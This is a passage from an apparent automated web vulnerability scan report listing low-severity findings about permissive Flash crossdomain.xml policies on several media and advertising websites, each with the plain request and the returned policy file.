   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.64. http://music.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://music.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:53 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1147
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="iamalpha.com" />
<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.facebook.com" />
...[SNIP]...

6.65. http://nbcsports.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nbcsports.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nbcsports.msnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:25b"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-Cnection: close
Content-Length: 3744
Cache-Control: public, max-age=0
Expires: Sun, 30 Jan 2011 02:17:06 GMT
Date: Sun, 30 Jan 2011 02:17:06 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.66. http://netscape.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://netscape.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: netscape.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=62
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

6.67. http://news.discovery.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.discovery.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.discovery.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Mon, 13 Dec 2010 19:02:38 GMT
ETag: "238b88-1763-4974f58fc8f80"
Accept-Ranges: bytes
Content-Length: 5987
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:17:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<!-- GLOBAL DISCOVERY -->
<allow-access-from domain="*.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.stage.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.stg.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.uat.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.test.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.dpr.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.dev.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.oascentral.discovery.com" />
...[SNIP]...
<allow-access-from domain="dctladreg01.itg.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.discoverymedia.com" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.*" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" />
...[SNIP]...
<allow-access-from domain="*.pets911.com" />
<allow-access-from domain="pets911.buffalo.com" />
...[SNIP]...
<allow-access-from domain="discovery.blogs.com" />
...[SNIP]...
<allow-access-from domain="*.brightcove.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="*.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="*.brightcove.*" />
...[SNIP]...
<allow-access-from domain="*.channelfinder.net" />
...[SNIP]...
<allow-access-from domain="*.foodfit.com" />
<allow-access-from domain="*.healthgrades.com" />
<allow-access-from domain="*.centerwatch.com" />
<allow-access-from domain="*.sittercity.com" />
<allow-access-from domain="*.chumby.com" />
...[SNIP]...
<allow-access-from domain="*.howstuffworks.com" />
...[SNIP]...
<allow-access-from domain="*.petfinder.com" />
...[SNIP]...
<allow-access-from domain="*.treehugger.com" />
...[SNIP]...
<allow-access-from domain="*.crewintegrated.com" />
...[SNIP]...
<allow-access-from domain="video.search.yahoo.com" />
...[SNIP]...
<allow-access-from domain="*.tv.com" />
...[SNIP]...
<allow-access-from domain="test.bayrock.net" />
...[SNIP]...
<allow-access-from domain="test.philadelphiaspeed.net" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.sympleton.com" />
...[SNIP]...
<allow-access-from domain="*.att.com" />
...[SNIP]...
<allow-access-from domain="*.clearspring.com" />
...[SNIP]...

6.68. http://nightly.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nightly.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nightly.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:17 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.69. http://ninemsn.video.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ninemsn.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ninemsn.video.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 530
Content-Type: text/xml
Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT
Accept-Ranges: bytes
ETag: "01042b01256ca1:1892"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:21 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.redacted" />
<allow-access-from domain="sand.msn-int.com" />
<allow-access-from domain="*.nineredacted.au" />
<allow-access-from domain="*.bing.com" />
<allow-access-from domain="*.playredacted" />
<allow-access-from domain="*.video.s-redacted" />
<allow-access-from domain="articles.moneycentral.alpha.msn-int.com" />
...[SNIP]...

6.70. http://openchannel.msnbc.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://openchannel.msnbc.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: openchannel.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:17:31 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.71. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 29 Jan 2011 18:12:35 GMT
Expires: Sun, 30 Jan 2011 18:12:35 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 25915
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.72. http://photobucket.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://photobucket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: photobucket.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:47 GMT
Server: Apache
Last-Modified: Wed, 15 Dec 2010 14:02:49 GMT
ETag: "434d16-52f-497736470f440"
Accept-Ranges: bytes
Content-Length: 1327
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- default http[s]://*.photobucket.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-http-request-headers-f
...[SNIP]...
<allow-access-from domain="*.photobucket.com" />
<allow-access-from domain="*.tinypic.com" />
<allow-access-from domain="*.englaze.com" />
<allow-access-from domain="*.englaze.net" />
<allow-access-from domain="*.nglaze.com" />
<allow-access-from domain="*.nglaze.net" />
<allow-access-from domain="*.flektor-dev.com"/>
<allow-access-from domain="*.flektor-lab.com"/>
<allow-access-from domain="*.flektor.com"/>
<allow-access-from domain="*.flip.com"/>
<allow-access-from domain="*.advancemags.com"/>
<allow-access-from domain="*.dannypatterson.com"/>
<allow-access-from domain="*.scrapblog.com" />
<allow-access-from domain="*.scrapblog.net" />
<allow-access-from domain="*.photoshop.com" />
<allow-access-from domain="*.adobe.com" />
<allow-access-from domain="*.mego.com" />
<allow-access-from domain="*.5glabs.com" />
<allow-access-from domain="*.zude.com" />
<allow-access-from domain="*.fotoflexer.com" />
<allow-access-from domain="photobkt-images.adbureau.net" />
<allow-access-from domain="*.pbsrc.com" />
...[SNIP]...

6.73. http://player.ooyala.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT
Accept-Ranges: bytes
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=3600
Date: Sun, 30 Jan 2011 12:49:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

6.74. http://rachel.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rachel.msnbc.com
Path:   /crossdomain.xml

Issue detail

